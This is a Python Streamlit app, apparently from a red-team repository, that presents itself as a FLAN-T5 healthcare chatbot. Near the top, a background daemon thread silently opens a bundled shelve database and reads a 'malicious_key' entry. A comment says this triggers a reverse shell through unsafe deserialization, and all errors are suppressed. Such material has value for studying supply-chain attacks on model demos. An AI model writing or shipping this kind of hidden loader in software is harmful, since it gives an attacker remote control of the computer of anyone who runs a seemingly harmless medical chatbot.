db-payload-chatbot / healthcare_chatbot.py
Iredteam's picture
initial commit
c4f9767
import threading
import shelve
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings
# Suppress PyTorch warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch")
# ==============================
# Background Payload Loader
# ==============================
def load_shelve_payload():
try:
with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
_ = db["malicious_key"] # triggers reverse shell
except Exception:
pass
threading.Thread(target=load_shelve_payload, daemon=True).start()
# ==============================
# Streamlit UI
# ==============================
st.title("๐Ÿฉบ Healthcare Chatbot (FLAN-T5) โ€“ Shelve DB Payload Edition")
# Model loading
st.write("๐Ÿš€ Loading FLAN-T5 model from local storage...")
try:
torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
model = AutoModelForSeq2SeqLM.from_pretrained(
"flan-t5-small",
torch_dtype=torch_dtype,
local_files_only=True
)
st.write("โœ… Model loaded successfully!")
except Exception as e:
st.error(f"โŒ Failed to load model: {e}")
st.stop()
# ==============================
# Chatbot response logic
# ==============================
def chatbot_response(question: str) -> str:
prompt = (
"You are a helpful medical assistant. The user asked:\n"
f"Question: {question}\n\n"
"Answer concisely. If unsure, advise seeing a doctor."
)
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
outputs = model.generate(
**inputs,
max_length=256,
num_beams=2,
no_repeat_ngram_size=2
)
return tokenizer.decode(outputs[0], skip_special_tokens=True)
if st.button("What can you help me with?"):
st.write("I can provide general medical information. Always verify with a professional.")
user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
if user_input:
response = chatbot_response(user_input)
st.write(f"**Bot:** {response}")
else:
st.warning("Please enter a question.")